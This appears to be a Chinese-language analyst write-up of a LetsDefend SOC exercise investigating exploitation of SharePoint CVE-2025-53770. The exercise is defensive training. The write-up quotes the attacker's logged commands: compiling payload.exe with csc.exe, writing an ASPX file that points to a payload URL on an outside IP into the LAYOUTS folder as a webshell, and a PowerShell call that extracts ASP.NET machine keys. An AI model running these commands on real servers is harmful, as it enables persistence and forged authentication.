一项活动 培养分析技能和报告能力
这是在Let's Defend平台上进行的一项调查,基于最近的一个SharePoint CVE。让我们来看一下。
SOC342规则检测到一个未认证的POST请求,目标是有漏洞的ToolPane.aspx页面,其特征包括:
一个外部用户(IP: 107.191.58.76)向内部SharePoint服务器(172.16.20.17)发送了一个精心构造的请求。
分析我们端点的日志
一个w3wp.exe进程执行编码的PowerShell命令可能表明存在潜在的漏洞利用或后利用活动(例如,执行隐藏的有效载荷)。
在SharePoint环境中,验证这种行为是预期的还是属于滥用非常重要。
该命令已使用base64进行混淆
此有效载荷允许攻击者提取并打印运行它的机器上的关键ASP.NET配置密钥。
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs
"C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
cmd.exe /c echo <WebShell> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
此命令在SharePoint LAYOUTS文件夹中创建一个名为spinstall0.aspx的文件,并将内容写入其中(此处是表示webshell代码的占位符)。
这是spinstall0.aspx的哈希值: 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514
让我们在VirusTotal上查看一下。

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"
此命令允许攻击者访问MachineKeySection的应用程序配置,从而可能暴露敏感加密密钥,如验证密钥和解密密钥。
这些密钥对ASP.NET安全至关重要,保护诸如身份验证cookie和ViewState之类的内容。
暴露或检索这些密钥可让攻击者伪造身份验证令牌、解密受保护数据,或对Web应用程序执行其他攻击。
MITRE ATT&CK

分析师备注:
该警报是由于在SharePoint服务器上观察到异常的PowerShell活动而触发的,后来被确定为针对CVE-2025-53770的利用尝试。攻击者首先使用C#编译器(csc.exe)投放并编译了一个自定义的C#可执行文件(payload.exe),然后在可Web访问的SharePoint目录中创建了一个恶意的ASPX webshell(spinstall0.aspx)。随后,运行了一个PowerShell命令,通过.NET反射从服务器配置中检索敏感的加密机器密钥。这一系列操作表明这是一个多阶段攻击,旨在维持持久控制并可能伪造身份验证令牌。该webshell经VirusTotal验证为恶意,检测比率为39/62。该事件确认为真阳性,建议采取进一步的遏制和修复措施。

CVE-2025-53770 详情
在本地版Microsoft SharePoint Server中,对不可信数据的反序列化允许未授权攻击者通过网络执行代码。Microsoft已知悉CVE-2025-53770存在野外利用。Microsoft正在准备并全面测试一个综合性更新以解决此漏洞。与此同时,请确保已应用此CVE文档中提供的缓解措施,以保护您免受利用。

Microsoft建议的缓解措施: 为缓解潜在攻击,客户应:
IoC
本报告基于在Let's Defend平台上进行的一次活动。所有发现和材料仅供教育目的。所有权利和所有权归Let's Defend所有。